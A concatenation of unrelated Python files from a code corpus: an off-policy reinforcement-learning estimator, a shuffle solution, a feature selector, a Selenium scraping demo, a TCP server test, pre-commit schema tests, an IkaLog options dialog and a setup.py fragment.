WeightedSequentialDoublyRobustEstimator.NUM_BOOTSTRAP_SAMPLES
):
random_idxs = np.random.choice(num_j_steps, sample_size, replace=False)
random_idxs.sort()
wdr_estimate = self.compute_weighted_doubly_robust_point_estimate(
j_steps=[j_steps[i] for i in random_idxs],
num_j_steps=sample_size,
j_step_returns=j_step_returns[random_idxs],
infinite_step_returns=infinite_step_returns,
j_step_return_trajectories=j_step_return_trajectories[random_idxs],
)
bootstrapped_means.append(wdr_estimate)
weighted_doubly_robust_std_error = np.std(bootstrapped_means)
episode_values = np.sum(np.multiply(rewards, discounts), axis=1)
denominator = np.nanmean(episode_values)
if abs(denominator) < 1e-6:
return CpeEstimate(
raw=0.0, normalized=0.0, raw_std_error=0.0, normalized_std_error=0.0
)
return CpeEstimate(
raw=weighted_doubly_robust,
normalized=weighted_doubly_robust / denominator,
raw_std_error=weighted_doubly_robust_std_error,
normalized_std_error=weighted_doubly_robust_std_error / denominator,
)
def compute_weighted_doubly_robust_point_estimate(
self,
j_steps,
num_j_steps,
j_step_returns,
infinite_step_returns,
j_step_return_trajectories,
):
low_bound, high_bound = WeightedSequentialDoublyRobustEstimator.confidence_bounds(
infinite_step_returns,
WeightedSequentialDoublyRobustEstimator.CONFIDENCE_INTERVAL,
)
# decompose error into bias + variance
j_step_bias = np.zeros([num_j_steps])
where_lower = np.where(j_step_returns < low_bound)[0]
j_step_bias[where_lower] = low_bound - j_step_returns[where_lower]
where_higher = np.where(j_step_returns > high_bound)[0]
j_step_bias[where_higher] = j_step_returns[where_higher] - high_bound
covariance = np.cov(j_step_return_trajectories)
error = covariance + j_step_bias.T * j_step_bias
# minimize mse error
constraint = {"type": "eq", "fun": lambda x: np.sum(x) - 1.0}
x = np.zeros([len(j_steps)])
res = sp.optimize.minimize(
mse_loss,
x,
args=error,
constraints=constraint,
bounds=[(0, 1) for _ in range(x.shape[0])],
)
x = np.array(res.x)
return float(np.dot(x, j_step_returns))
@staticmethod
def transform_to_equal_length_trajectories(
mdp_ids,
actions,
rewards,
logged_propensities,
target_propensities,
estimated_q_values,
):
"""
Take in samples (action, rewards, propensities, etc.) and output lists
of equal-length trajectories (episodes) accoriding to terminals.
As the raw trajectories are of various lengths, the shorter ones are
filled with zeros(ones) at the end.
"""
num_actions = len(target_propensities[0])
terminals = np.zeros(mdp_ids.shape[0])
for x in range(0, mdp_ids.shape[0]):
if x + 1 == mdp_ids.shape[0] or mdp_ids[x, 0] != mdp_ids[x + 1, 0]:
terminals[x] = 1
trajectories = []
episode_start = 0
episode_ends = np.nonzero(terminals)[0]
if len(terminals) - 1 not in episode_ends:
episode_ends = np.append(episode_ends, len(terminals) - 1)
for episode_end in episode_ends:
trajectories.append(np.arange(episode_start, episode_end + 1))
episode_start = episode_end + 1
action_trajectories = []
reward_trajectories = []
logged_propensity_trajectories = []
target_propensity_trajectories = []
Q_value_trajectories = []
for trajectory in trajectories:
action_trajectories.append(actions[trajectory])
reward_trajectories.append(rewards[trajectory])
logged_propensity_trajectories.append(logged_propensities[trajectory])
target_propensity_trajectories.append(target_propensities[trajectory])
Q_value_trajectories.append(estimated_q_values[trajectory])
def to_equal_length(x, fill_value):
x_equal_length = np.array(
list(itertools.zip_longest(*x, fillvalue=fill_value))
).swapaxes(0, 1)
return x_equal_length
action_trajectories = to_equal_length(
action_trajectories, np.zeros([num_actions])
)
reward_trajectories = to_equal_length(reward_trajectories, 0)
logged_propensity_trajectories = to_equal_length(
logged_propensity_trajectories, 1
)
target_propensity_trajectories = to_equal_length(
target_propensity_trajectories, np.zeros([num_actions])
)
Q_value_trajectories = to_equal_length(
Q_value_trajectories, np.zeros([num_actions])
)
return (
action_trajectories,
reward_trajectories,
logged_propensity_trajectories,
target_propensity_trajectories,
Q_value_trajectories,
)
@staticmethod
def normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
):
if whether_self_normalize_importance_weights:
sum_importance_weights = np.sum(importance_weights, axis=0)
where_zeros = np.where(sum_importance_weights == 0.0)[0]
sum_importance_weights[where_zeros] = len(importance_weights)
importance_weights[:, where_zeros] = 1.0
importance_weights /= sum_importance_weights
return importance_weights
else:
importance_weights /= importance_weights.shape[0]
return importance_weights
@staticmethod
def calculate_step_return(
rewards,
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values,
estimated_q_values,
j_step,
):
trajectory_length = len(rewards[0])
num_trajectories = len(rewards)
j_step = int(min(j_step, trajectory_length - 1))
weighted_discounts = np.multiply(discounts, importance_weights)
weighted_discounts_one_earlier = np.multiply(
discounts, importance_weights_one_earlier
)
importance_sampled_cumulative_reward = np.sum(
np.multiply(weighted_discounts[:, : j_step + 1], rewards[:, : j_step + 1]),
axis=1,
)
if j_step < trajectory_length - 1:
direct_method_value = (
weighted_discounts_one_earlier[:, j_step + 1]
* estimated_state_values[:, j_step + 1]
)
else:
direct_method_value = np.zeros([num_trajectories])
control_variate = np.sum(
np.multiply(
weighted_discounts[:, : j_step + 1], estimated_q_values[:, : j_step + 1]
)
- np.multiply(
weighted_discounts_one_earlier[:, : j_step + 1],
estimated_state_values[:, : j_step + 1],
),
axis=1,
)
j_step_return = (
importance_sampled_cumulative_reward + direct_method_value - control_variate
)
return j_step_return
@staticmethod
def confidence_bounds(x, confidence):
n = len(x)
m, se = np.mean(x), sp.stats.sem(x)
h = se * sp.stats.t._ppf((1 + confidence) / 2.0, n - 1)
return m - h, m + h
def mse_loss(x, error):
return np.dot(np.dot(x, error), x.T)
| 2.015625 | 2 |
LeetCode/2019-08-03-384-Shuffle-an-Array.py | HeRuivio/-Algorithm | 5 | 3480 | # -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-08-03 10:48:30
# @Last Modified by: 何睿
# @Last Modified time: 2019-08-03 10:53:15
import copy
import random
from typing import List
class Solution:
def __init__(self, nums: List[int]):
self.shuffle_ = nums
self.original = copy.copy(nums)
def reset(self) -> List[int]:
"""
Resets the array to its original configuration and return it.
"""
return self.original
def shuffle(self) -> List[int]:
"""
Returns a random shuffling of the array.
"""
random.shuffle(self.shuffle_)
return self.shuffle_
| 3.828125 | 4 |
src/wspc/feature_selection.py | shakedna1/wspc_rep | 0 | 3481 | import numpy as np
import sklearn
import pandas as pd
import scipy.spatial.distance as ssd
from scipy.cluster import hierarchy
from scipy.stats import chi2_contingency
from sklearn.base import BaseEstimator
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_selection import SelectKBest, SelectorMixin
from sklearn.pipeline import Pipeline
class SelectHierarchicalClustering(SelectorMixin, BaseEstimator):
"""
A transformer that clusters the features in X according to dist_matrix, and selects a feature from each cluster with
the highest chi2 score of X[feature] versus y
"""
def __init__(self, dist_matrix=None, threshold=1):
self.dist_matrix = dist_matrix
self.threshold = threshold
def _phi_coef(self, x, y):
"""
Calculates phi coefficient between features
Parameters
----------
x - feature x column
y - feature y column
Returns
----------
phi coefficient value
"""
confusion_matrix = pd.crosstab(x, y)
chi2 = chi2_contingency(confusion_matrix)[0]
n = confusion_matrix.sum().sum()
corr = np.sqrt(chi2 / n)
return corr
def _calc_dist_matrix(self, X):
"""
Calculate distance matrix between each two features in X, each value is 1-phi_correlation
"""
X_df = pd.DataFrame.sparse.from_spmatrix(X)
X_corr_mat = X_df.corr(method=self._phi_coef)
feature_corr_dist_matrix = 1 - X_corr_mat
feature_corr_dist_matrix_condensed = ssd.squareform(feature_corr_dist_matrix)
self.dist_matrix = feature_corr_dist_matrix_condensed
def _corr_linkage(self, method='average'):
linkage = hierarchy.linkage(self.dist_matrix, method=method)
return linkage
def _hierarchical_clustering(self, linkage):
"""
Perform hierarchical clustering
Parameters
----------
linkage - linkage dendogram created by hierarchy.linkage(self.distance_matrix, method=method)
Returns
----------
a list of lists, each list represents a cluster and contains the indexes of features belonging
to the cluster
"""
# array of len(X) - array[i] is the cluster number to which sample i belongs
cluster_ids = hierarchy.fcluster(linkage, self.threshold, criterion='distance')
cluster_id_to_feature_idx = {}
for idx, cluster_id in enumerate(cluster_ids):
cluster_id_to_feature_idx.setdefault(cluster_id, []).append(idx)
return list(cluster_id_to_feature_idx.values())
def fit(self, X, y):
"""
Clusters the features (X columns) using self.dist_matrix and self.threshold, and selects a feature from each
cluster with the highest chi2 score versus y.
The attribute self.n_features_ represents the number of features selected (=number of clusters)
The attribute self.selected_features_ is a list of indexes that correspond to the selected features
"""
if not self.dist_matrix:
self._calc_dist_matrix(X)
linkage = self._corr_linkage()
clusters = self._hierarchical_clustering(linkage)
chi2_vals, __ = sklearn.feature_selection.chi2(X, y)
chi2_vals = pd.Series(chi2_vals)
# fitted attributes
self.n_features_ = X.shape[1]
self.selected_features_ = [chi2_vals[cluster].idxmax() for cluster in clusters]
self.clusters_ = clusters
print(f'threshold={self.threshold:.2f}, selected_features={len(self.selected_features_)}')
return self
def _get_support_mask(self):
"""
Get the boolean mask indicating which features are selected
Returns
----------
mask - boolean array of shape [# input features]
An element is True iff its corresponding feature is selected for
retention.
"""
# Checks if the estimator is fitted by verifying the presence of fitted attributes (ending with a trailing
# underscore) and otherwise raises a NotFittedError with the given message.
sklearn.utils.validation.check_is_fitted(self)
mask = np.zeros((self.n_features_, ), dtype=bool)
mask[self.selected_features_] = 1
return mask
def get_fs_pipeline(k, threshold, random_state=0):
"""
Creates feature selection pipeline
Parameters
----------
k - the k parameter for the SelectKBest features function
threshold - clustering threshold for the Hierarchial clustering
random_state - random state for the RandomForestClassifier. Deafult value: 0
Returns
----------
pipeline - feature selection pipeline
"""
pipeline = Pipeline(steps=[('vectorize', CountVectorizer(lowercase=False, binary=True)),
('k_best', SelectKBest(score_func=sklearn.feature_selection.chi2, k=k)),
('cluster', SelectHierarchicalClustering(threshold=threshold)),
('rf', RandomForestClassifier(random_state=random_state))])
return pipeline
| 2.640625 | 3 |
Python3/PS_scraping_selenium.py | fsj-digital/pages | 5 | 3482 | from bs4 import BeautifulSoup
import requests
import re
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.touch_actions import TouchActions
from selenium.common.exceptions import TimeoutException
URL = 'https://shopping.thinkwithgoogle.com'
EXAMPLES = ["Demonstrate unexpected use-case",
"Demonstrate google search",
"Demonstrate search on thinkwithgoogle",
"Demonstrate search on WebDriverWait",
"Demonstrate search on thinkwithgoogle search result",
"Download and extract additional data",
"Demonstrate maximizing screen",
"Demonstrate mouse actions for Chrome",
"Demonstrate navigation"]
def run(input, URL):
if(input == 0):
content = requests.get(URL)
soup = BeautifulSoup(content.text,'html.parser')
print(soup.prettify()) # Print row with HTML formatting
elif(input == 1):
driver = webdriver.Safari()
driver.get("https://www.google.com")
search = driver.find_element_by_name("q")
search.send_keys("Sel<PASSWORD>") # Google Search "Selenium"
search.submit()
elif(input == 2):
browser = webdriver.Safari()
browser.get(URL)
time.sleep(5)
search = browser.find_elements_by_id('subjectInput')[1]
search.send_keys('Google <PASSWORD>') # Google Search "Google Pixel 3"
time.sleep(5)
search.send_keys(Keys.RETURN)
elif(input == 3):
browser = webdriver.Safari()
browser.maximize_window() # Required for the input tag visibility
browser.get('https://trends.google.com/trends/')
try: # proceed if element is found within 3 seconds otherwise raise TimeoutException
element = WebDriverWait(browser, 3).until(EC.presence_of_element_located((By.ID, 'input-254')))
except TimeoutException:
print("Loading took too much time!")
search = browser.find_elements(By.ID,'input-254')[0]
search.send_keys('Google Pixel 3')
elif(input == 4):
browser = webdriver.Safari()
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
elif(input == 5):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
time.sleep(2)
browser.find_element_by_class_name('si-button-data download-all').click()
data = browser.find_element_by_class_name('content content-breakpoint-gt-md')
dataList = data.find_elements_by_tag_name('li')
for item in dataList:
text = item.text
print(text)
elif(input == 6):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
element_to_hover_over = returnVisibleElement(browser.find_elements_by_xpath("//i[@class='material-icons'][contains(./text(),'help')]"))
elif(input == 7):
browser = webdriver.Chrome()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
element_to_hover_over = returnVisibleElement(browser.find_elements_by_xpath("//i[@class='material-icons'][contains(./text(),'help')]"))
## ActionChains are not supported in safari but will work on other browser
## https://github.com/seleniumhq/selenium-google-code-issue-archive/issues/4136
ActionChains(browser).click(element_to_hover_over).perform()
TouchActions(browser).long_press(element_to_hover_over).perform()
elif(input == 8):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
time.sleep(2)
data = browser.find_element_by_class_name('content content-breakpoint-gt-md')
dataList = data.find_elements_by_tag_name('li')
for item in dataList:
text = item.text
print(text)
browser.back()
print('\n' * 5) # For convenient visual
def returnVisibleElement(listOfInputElements):
for element in listOfInputElements:
if element.is_displayed():
return element
def printSelection():
print('Press:')
for i in range(0, len(EXAMPLES)):
print('',i,'to',EXAMPLES[i], sep = ' ')
if __name__ == '__main__':
while(True):
printSelection()
choice = input('Enter choice: ')
try:
choice = int(choice)
except ValueError:
print('Invalid input, stop program')
break
if(choice not in range(0,9)):
print('Invalid input, stop program')
break
run(int(choice), URL)
| 3.046875 | 3 |
AppTest/testTCPserver.py | STRATOLOGIC/SpacePyLibrary | 22 | 3483 | #!/usr/bin/env python3
#******************************************************************************
# (C) 2018, <NAME>, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Unit Tests *
#******************************************************************************
import sys
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import UTIL.SYS, UTIL.TASK, UTIL.TCP
#############
# constants #
#############
LINEBUFFERLEN = 256
###########
# classes #
###########
# =============================================================================
class TCPserver(UTIL.TCP.SingleClientServer):
"""Subclass of UTIL.TCP.SingleClientServer"""
# ---------------------------------------------------------------------------
def __init__(self, portNr):
"""Initialise attributes only"""
modelTask = UTIL.TASK.s_processingTask
UTIL.TCP.SingleClientServer.__init__(self, modelTask, portNr)
self.tcpLineBuffer = ""
# ---------------------------------------------------------------------------
def receiveCallback(self, socket, stateMask):
"""Callback when a client has send data"""
LOG("*** receiveCallback ***")
# read the next set of byte from the data socket
data = self.recv(LINEBUFFERLEN)
if data == None:
# client is automatically disconnected
return
tcpLineBuffer = self.tcpLineBuffer
tcpLineBuffer += data.decode("ascii")
LOG("tcpLineBuffer: " + tcpLineBuffer)
# handle the input: extract the lines from the line buffer
lines = tcpLineBuffer.split("\n")
# the last line has to be handled in a special way and can not be
# processed directly
lastLine = lines[-1]
lines = lines[:-1]
if lastLine == "":
# read of the data was complete (incl. "\n")
pass
else:
# last line was cutt off and the rest should come with the next read
self.tcpLineBuffer = lastLine
for line in lines:
# remove a terminating "\r" for clients like telnet
if line[-1] == "\r":
line = line[:-1]
# terminate the client connection if exit has been entered (case insensitive)
upperLine = line.upper()
if (upperLine == "X") or (upperLine == "EXIT"):
LOG("Exit requested")
# send the OK response back to the client
retString = "OK\n"
self.send(retString.encode())
# terminate the client connection
self.disconnectClient();
return
if (upperLine == "Q") or (upperLine == "QUIT"):
LOG("Quit requested")
# send the OK response back to the client
retString = "OK\n"
self.send(retString.encode())
# terminate the client connection
self.disconnectClient();
sys.exit(0)
# delegate the input
pstatus = self.processLine(line);
if pstatus == 0:
LOG("OK")
# send the OK response back to the TECO
retString = "OK\n";
self.send(retString.encode())
else:
LOG_ERROR(str(pstatus))
# set the Error response back to the client:
retString = "Error: execution failed (see log)!\n"
self.send(retString.encode())
# ---------------------------------------------------------------------------
def processLine(self, line):
"""Callback when a client has send a data line"""
LOG("line = " + line)
return 0
#############
# functions #
#############
# -----------------------------------------------------------------------------
def initConfiguration():
"""initialise the system configuration"""
UTIL.SYS.s_configuration.setDefaults([
["HOST", "127.0.0.1"],
["SERVER_PORT", "1234"]])
# -----------------------------------------------------------------------------
def createServer():
"""create the TCP server"""
server = TCPserver(portNr=int(UTIL.SYS.s_configuration.SERVER_PORT))
if not server.openConnectPort(UTIL.SYS.s_configuration.HOST):
sys.exit(-1)
# activate zyclic idle function
idleFunction()
# -----------------------------------------------------------------------------
def idleFunction():
UTIL.TASK.s_processingTask.createTimeHandler(1000, idleFunction)
LOG("--- idle ---")
########
# main #
########
if __name__ == "__main__":
# initialise the system configuration
initConfiguration()
# initialise the console handler
consoleHandler = UTIL.TASK.ConsoleHandler()
# initialise the model
modelTask = UTIL.TASK.ProcessingTask(isParent=True)
# register the console handler
modelTask.registerConsoleHandler(consoleHandler)
# create the TCP server
LOG("Open the TCP server")
createServer()
# start the tasks
LOG("start modelTask...")
modelTask.start()
| 1.632813 | 2 |
tests/clientlib_test.py | yoavcaspi/pre-commit | 0 | 3484 | <reponame>yoavcaspi/pre-commit
from __future__ import unicode_literals
import logging
import cfgv
import pytest
import pre_commit.constants as C
from pre_commit.clientlib import check_type_tag
from pre_commit.clientlib import CONFIG_HOOK_DICT
from pre_commit.clientlib import CONFIG_REPO_DICT
from pre_commit.clientlib import CONFIG_SCHEMA
from pre_commit.clientlib import DEFAULT_LANGUAGE_VERSION
from pre_commit.clientlib import MANIFEST_SCHEMA
from pre_commit.clientlib import MigrateShaToRev
from pre_commit.clientlib import validate_config_main
from pre_commit.clientlib import validate_manifest_main
from testing.fixtures import sample_local_config
def is_valid_according_to_schema(obj, obj_schema):
try:
cfgv.validate(obj, obj_schema)
return True
except cfgv.ValidationError:
return False
@pytest.mark.parametrize('value', ('definitely-not-a-tag', 'fiel'))
def test_check_type_tag_failures(value):
with pytest.raises(cfgv.ValidationError):
check_type_tag(value)
@pytest.mark.parametrize(
('config_obj', 'expected'), (
(
{
'repos': [{
'repo': 'git<EMAIL>:pre-commit/pre-commit-hooks',
'rev': 'cd74dc150c142c3be70b24eaf0b02cae9d235f37',
'hooks': [{'id': 'pyflakes', 'files': '\\.py$'}],
}],
},
True,
),
(
{
'repos': [{
'repo': '<EMAIL>:pre-commit/pre-commit-hooks',
'rev': 'cd74dc150c142c3be70b24eaf0b02cae9d235f37',
'hooks': [
{
'id': 'pyflakes',
'files': '\\.py$',
'args': ['foo', 'bar', 'baz'],
},
],
}],
},
True,
),
(
{
'repos': [{
'repo': '<EMAIL>:pre-commit/pre-commit-hooks',
'rev': 'cd74dc150c142c3be70b24eaf0b02cae9d235f37',
'hooks': [
{
'id': 'pyflakes',
'files': '\\.py$',
# Exclude pattern must be a string
'exclude': 0,
'args': ['foo', 'bar', 'baz'],
},
],
}],
},
False,
),
),
)
def test_config_valid(config_obj, expected):
ret = is_valid_according_to_schema(config_obj, CONFIG_SCHEMA)
assert ret is expected
def test_local_hooks_with_rev_fails():
config_obj = {'repos': [dict(sample_local_config(), rev='foo')]}
with pytest.raises(cfgv.ValidationError):
cfgv.validate(config_obj, CONFIG_SCHEMA)
def test_config_with_local_hooks_definition_passes():
config_obj = {'repos': [sample_local_config()]}
cfgv.validate(config_obj, CONFIG_SCHEMA)
def test_config_schema_does_not_contain_defaults():
"""Due to the way our merging works, if this schema has any defaults they
will clobber potentially useful values in the backing manifest. #227
"""
for item in CONFIG_HOOK_DICT.items:
assert not isinstance(item, cfgv.Optional)
def test_validate_manifest_main_ok():
assert not validate_manifest_main(('.pre-commit-hooks.yaml',))
def test_validate_config_main_ok():
assert not validate_config_main(('.pre-commit-config.yaml',))
def test_validate_config_old_list_format_ok(tmpdir):
f = tmpdir.join('cfg.yaml')
f.write('- {repo: meta, hooks: [{id: identity}]}')
assert not validate_config_main((f.strpath,))
def test_validate_warn_on_unknown_keys_at_repo_level(tmpdir, caplog):
f = tmpdir.join('cfg.yaml')
f.write(
'- repo: https://gitlab.com/pycqa/flake8\n'
' rev: 3.7.7\n'
' hooks:\n'
' - id: flake8\n'
' args: [--some-args]\n',
)
ret_val = validate_config_main((f.strpath,))
assert not ret_val
assert caplog.record_tuples == [
(
'pre_commit',
logging.WARNING,
'Unexpected config key(s): args',
),
]
def test_validate_warn_on_unknown_keys_at_top_level(tmpdir, caplog):
f = tmpdir.join('cfg.yaml')
f.write(
'repos:\n'
'- repo: https://gitlab.com/pycqa/flake8\n'
' rev: 3.7.7\n'
' hooks:\n'
' - id: flake8\n'
'foo:\n'
' id: 1.0.0\n',
)
ret_val = validate_config_main((f.strpath,))
assert not ret_val
assert caplog.record_tuples == [
(
'pre_commit',
logging.WARNING,
'Unexpected config key(s): foo',
),
]
@pytest.mark.parametrize('fn', (validate_config_main, validate_manifest_main))
def test_mains_not_ok(tmpdir, fn):
not_yaml = tmpdir.join('f.notyaml')
not_yaml.write('{')
not_schema = tmpdir.join('notconfig.yaml')
not_schema.write('{}')
assert fn(('does-not-exist',))
assert fn((not_yaml.strpath,))
assert fn((not_schema.strpath,))
@pytest.mark.parametrize(
('manifest_obj', 'expected'),
(
(
[{
'id': 'a',
'name': 'b',
'entry': 'c',
'language': 'python',
'files': r'\.py$',
}],
True,
),
(
[{
'id': 'a',
'name': 'b',
'entry': 'c',
'language': 'python',
'language_version': 'python3.4',
'files': r'\.py$',
}],
True,
),
(
# A regression in 0.13.5: always_run and files are permissible
[{
'id': 'a',
'name': 'b',
'entry': 'c',
'language': 'python',
'files': '',
'always_run': True,
}],
True,
),
),
)
def test_valid_manifests(manifest_obj, expected):
ret = is_valid_according_to_schema(manifest_obj, MANIFEST_SCHEMA)
assert ret is expected
@pytest.mark.parametrize(
'dct',
(
{'repo': 'local'}, {'repo': 'meta'},
{'repo': 'wat', 'sha': 'wat'}, {'repo': 'wat', 'rev': 'wat'},
),
)
def test_migrate_sha_to_rev_ok(dct):
MigrateShaToRev().check(dct)
def test_migrate_sha_to_rev_dont_specify_both():
with pytest.raises(cfgv.ValidationError) as excinfo:
MigrateShaToRev().check({'repo': 'a', 'sha': 'b', 'rev': 'c'})
msg, = excinfo.value.args
assert msg == 'Cannot specify both sha and rev'
@pytest.mark.parametrize(
'dct',
(
{'repo': 'a'},
{'repo': 'meta', 'sha': 'a'}, {'repo': 'meta', 'rev': 'a'},
),
)
def test_migrate_sha_to_rev_conditional_check_failures(dct):
with pytest.raises(cfgv.ValidationError):
MigrateShaToRev().check(dct)
def test_migrate_to_sha_apply_default():
dct = {'repo': 'a', 'sha': 'b'}
MigrateShaToRev().apply_default(dct)
assert dct == {'repo': 'a', 'rev': 'b'}
def test_migrate_to_sha_ok():
dct = {'repo': 'a', 'rev': 'b'}
MigrateShaToRev().apply_default(dct)
assert dct == {'repo': 'a', 'rev': 'b'}
@pytest.mark.parametrize(
'config_repo',
(
# i-dont-exist isn't a valid hook
{'repo': 'meta', 'hooks': [{'id': 'i-dont-exist'}]},
# invalid to set a language for a meta hook
{'repo': 'meta', 'hooks': [{'id': 'identity', 'language': 'python'}]},
# name override must be string
{'repo': 'meta', 'hooks': [{'id': 'identity', 'name': False}]},
),
)
def test_meta_hook_invalid(config_repo):
with pytest.raises(cfgv.ValidationError):
cfgv.validate(config_repo, CONFIG_REPO_DICT)
@pytest.mark.parametrize(
'mapping',
(
# invalid language key
{'pony': '1.0'},
# not a string for version
{'python': 3},
),
)
def test_default_language_version_invalid(mapping):
with pytest.raises(cfgv.ValidationError):
cfgv.validate(mapping, DEFAULT_LANGUAGE_VERSION)
def test_minimum_pre_commit_version_failing():
with pytest.raises(cfgv.ValidationError) as excinfo:
cfg = {'repos': [], 'minimum_pre_commit_version': '999'}
cfgv.validate(cfg, CONFIG_SCHEMA)
assert str(excinfo.value) == (
'\n'
'==> At Config()\n'
'==> At key: minimum_pre_commit_version\n'
'=====> pre-commit version 999 is required but version {} is '
'installed. Perhaps run `pip install --upgrade pre-commit`.'.format(
C.VERSION,
)
)
def test_minimum_pre_commit_version_passing():
cfg = {'repos': [], 'minimum_pre_commit_version': '0'}
cfgv.validate(cfg, CONFIG_SCHEMA)
@pytest.mark.parametrize('schema', (CONFIG_SCHEMA, CONFIG_REPO_DICT))
def test_warn_additional(schema):
allowed_keys = {item.key for item in schema.items if hasattr(item, 'key')}
warn_additional, = [
x for x in schema.items if isinstance(x, cfgv.WarnAdditionalKeys)
]
assert allowed_keys == set(warn_additional.keys)
| 1.804688 | 2 |
ikalog/ui/options.py | fetus-hina/IkaLog | 285 | 3485 | <reponame>fetus-hina/IkaLog
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gettext
import wx
import wx.lib.scrolledpanel
import ikalog.outputs
from ikalog.ui.events import *
from ikalog.ui.panel import *
from ikalog.ui import VideoCapture
from ikalog.utils import *
_ = Localization.gettext_translation('IkaUI', fallback=True).gettext
class OptionsGUI(object):
def __init__(self, ikalog_gui):
self.ikalog_gui = ikalog_gui
self.frame = None
self._init_frame()
def _init_frame(self):
if self.frame:
return
self.frame = wx.Frame(
self.ikalog_gui.frame, wx.ID_ANY, _("Options"), size=(640, 500))
self.notebook = wx.Notebook(self.frame, wx.ID_ANY)
# Apply button
button_apply = wx.Button(self.frame, wx.ID_ANY, _(u'Apply'))
# Use a bold font.
apply_font = button_apply.GetFont()
apply_font.SetWeight(wx.FONTWEIGHT_BOLD)
button_apply.SetFont(apply_font)
button_cancel = wx.Button(self.frame, wx.ID_ANY, _(u'Cancel'))
button_load_default = wx.Button(
self.frame, wx.ID_ANY, _(u'Load default'))
buttons_sizer = wx.BoxSizer(wx.HORIZONTAL)
buttons_sizer.Add(button_apply)
buttons_sizer.Add(button_cancel)
buttons_sizer.Add(button_load_default)
top_sizer = wx.BoxSizer(wx.VERTICAL)
top_sizer.Add(self.notebook)
top_sizer.Add(buttons_sizer)
self.frame.SetSizer(top_sizer)
# Set event handlers for buttons.
button_apply.Bind(wx.EVT_BUTTON, self.on_button_apply)
button_cancel.Bind(wx.EVT_BUTTON, self.on_button_cancel)
button_load_default.Bind(wx.EVT_BUTTON, self.on_button_load_default)
outputs = [self.ikalog_gui.capture] + self.ikalog_gui.outputs
self._init_outputs(outputs)
# self.capture.panel is a part of self.frame. This Bind propagates
# capture's source change to the preview.
self.ikalog_gui.capture.panel.Bind(
EVT_INPUT_INITIALIZED, self.ikalog_gui.on_input_initialized)
# Refresh UI of each plugin.
self.ikalog_gui.engine.call_plugins(
'on_config_load_from_context', debug=True)
def show(self):
if not self.frame:
self._init_frame()
self.frame.Show()
self.frame.Raise()
def on_button_apply(self, event):
self.ikalog_gui.on_options_apply(event)
def on_button_cancel(self, event):
self.ikalog_gui.on_options_cancel(event)
def on_button_load_default(self, event):
self.ikalog_gui.on_options_load_default(event)
def _init_outputs(self, outputs):
output_dict = {}
for output in outputs:
output_dict[output.__class__] = output
# Keys for outputs in the main page.
keys = [
ikalog.ui.VideoCapture,
ikalog.outputs.OBS,
ikalog.outputs.StatInk,
ikalog.outputs.Twitter
]
# Keys for outputs combined into the misc tab.
misc_keys = [
ikalog.outputs.CSV,
ikalog.outputs.JSON,
ikalog.outputs.Screenshot,
ikalog.outputs.Boyomi,
ikalog.outputs.Slack,
ikalog.outputs.WebSocketServer,
]
for key in output_dict.keys():
if key in misc_keys:
continue
if key not in keys:
keys.append(key)
# Main tabs
index = 0
for key in keys:
output = output_dict.get(key)
if not output:
continue
output.on_option_tab_create(self.notebook)
self.notebook.InsertPage(index, output.panel, output.panel_name)
index += 1
# Misc tab
self.misc_panel = wx.lib.scrolledpanel.ScrolledPanel(
self.notebook, wx.ID_ANY, size=(640, 360))
self.misc_panel_sizer = wx.BoxSizer(wx.VERTICAL)
default_font = self.misc_panel.GetFont()
title_font = wx.Font(default_font.GetPointSize(),
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_BOLD)
for key in misc_keys:
output = output_dict.get(key)
if not output:
continue
output.on_option_tab_create(self.misc_panel)
title = wx.StaticText(self.misc_panel, wx.ID_ANY, output.panel_name)
title.SetFont(title_font)
self.misc_panel_sizer.Add(title)
self.misc_panel_sizer.Add(
output.panel, flag=wx.EXPAND | wx.ALL, border=10)
self.misc_panel_sizer.Add((-1, 25))
self.misc_panel.SetSizer(self.misc_panel_sizer)
self.misc_panel.SetupScrolling()
self.notebook.InsertPage(index, self.misc_panel, _('Misc.'))
| 2.03125 | 2 |
setup.py | CyberTKR/Simple-LINELIB | 4 | 3486 | from setuptools import setup, find_packages
with open("README.md", 'r',encoding="utf-8") as f:
long_description = f.read()
setup(
name='LineBot',
version='0.1.0',
